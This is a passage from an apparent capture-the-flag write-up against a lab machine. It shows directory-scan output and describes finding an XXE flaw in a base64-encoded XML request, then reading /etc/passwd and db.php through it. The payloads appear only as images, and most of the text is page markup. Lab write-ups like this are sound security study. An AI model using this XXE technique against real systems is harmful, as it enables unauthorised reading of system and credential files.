200      GET      195l      683w    66699c http://10.129.95.166/assets/img/portfolio/cabin.png
200      GET      151l      616w    50204c http://10.129.95.166/assets/img/portfolio/circus.png
200      GET        0l        0w        0c http://10.129.95.166/db.php
200      GET        7l      567w    48945c http://10.129.95.166/resources/bootstrap_login.min.js
200      GET        7l     1031w    84152c http://10.129.95.166/resources/bootstrap.bundle.min.js
200      GET        2l     1297w    89476c http://10.129.95.166/resources/jquery.min.js
200      GET        4l     1298w    86659c http://10.129.95.166/resources/jquery_login.min.js
200      GET      388l     1470w    25169c http://10.129.95.166/index.php
200      GET    10240l    19373w   187375c http://10.129.95.166/css/styles.css
200      GET       20l       63w      617c http://10.129.95.166/log_submit.php
301      GET        9l       28w      318c http://10.129.95.166/resources =&gt; http://10.129.95.166/resources/
200      GET        5l   108280w  1194961c http://10.129.95.166/resources/all.js
200      GET      388l     1470w    25169c http://10.129.95.166/
[&gt;-------------------] - 15s     5446/240094  11m     found:29      errors:52     
&#128680; Caught ctrl+c &#128680; saving scan state to ferox-http_10_129_95_166_-1775112934.state ...
[&gt;-------------------] - 15s     5527/240094  11m     found:29      errors:52     
[&gt;-------------------] - 15s     1694/60000   116/s   http://10.129.95.166/ 
[&gt;-------------------] - 12s     1396/60000   116/s   http://10.129.95.166/js/ 
[&gt;-------------------] - 12s     1552/60000   129/s   http://10.129.95.166/css/ 
[####################] - 7s     60000/60000   8191/s  http://10.129.95.166/resources/ =&gt; Directory listing (add --scan-dir-listings to scan)
[&gt;-------------------] - 11s      748/60000   67/s    http://10.129.95.166/assets/ 
[--------------------] - 0s         0/60000   -       http://10.129.95.166/resources/lato.css </code></pre></div><ol start="3"><li><p><em>BurpSuite for XXE Discovery</em></p></li></ol><p>So looking at the request, we actually found out that&#8217;s its giving POST request as base64 encoded XML format.</p><p>Leading to potential XXE to me.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!H1eF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!H1eF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!H1eF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!H1eF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!H1eF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!H1eF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png" width="1456" height="827" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:827,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:174108,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!H1eF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!H1eF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!H1eF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!H1eF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5bb9961-ed3b-47b4-8320-39491472843a_1584x900.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Here:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4H42!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4H42!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!4H42!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!4H42!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!4H42!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4H42!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png" width="1584" height="900" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:900,&quot;width&quot;:1584,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:219584,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb3497137-a7c2-458a-9db3-8be4c67cbb09_1584x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4H42!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!4H42!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!4H42!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!4H42!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F38c27703-0b7b-45db-99c9-3dcd058d3a6f_1584x900.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>For simpler and time saving, here&#8217;s the final Payload for simple reading the /etc/passwd file from XXE vuln:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y1bW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y1bW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 424w, https://substackcdn.com/image/fetch/$s_!Y1bW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 848w, https://substackcdn.com/image/fetch/$s_!Y1bW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 1272w, https://substackcdn.com/image/fetch/$s_!Y1bW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y1bW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png" width="556" height="319.8716049382716" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:233,&quot;width&quot;:405,&quot;resizeWidth&quot;:556,&quot;bytes&quot;:28060,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8df490bd-af1e-4e18-96a4-8eb8614136ef_1231x743.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y1bW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 424w, https://substackcdn.com/image/fetch/$s_!Y1bW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 848w, https://substackcdn.com/image/fetch/$s_!Y1bW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 1272w, https://substackcdn.com/image/fetch/$s_!Y1bW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa396aa2d-1a99-4a9a-823f-df058bffa8ea_405x233.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>(Substack FLAGGED my XML)</p><p>Which we will needed to double protect it: Base64 encode + URL encode.</p><ul><li><p>Base64 Encode</p></li><li><p>URL Encoding</p></li></ul><p>And become:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!m-y5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!m-y5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!m-y5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!m-y5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!m-y5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!m-y5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png" width="1584" height="900" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:900,&quot;width&quot;:1584,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:147545,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd8882d-e2f7-4e92-bd9d-618753bd11f6_1584x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!m-y5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!m-y5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!m-y5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!m-y5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0584c010-ae47-4d53-b2df-c0e2319b0aed_1584x900.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tApk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tApk!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!tApk!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!tApk!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!tApk!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tApk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png" width="1456" height="827" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:827,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:280685,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tApk!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!tApk!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!tApk!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!tApk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F37dab32e-59e7-48b0-97fd-c862b191069f_1584x900.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Dope!</p><ol start="4"><li><p><em>XXE For Retrieve Internal Information </em></p></li></ol><p>Still with the same principal, and based on information from dp.php folder we found from Feroxbuster earlier.</p><p>db.php:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vuoF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vuoF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!vuoF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!vuoF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!vuoF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vuoF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png" width="1456" height="884" 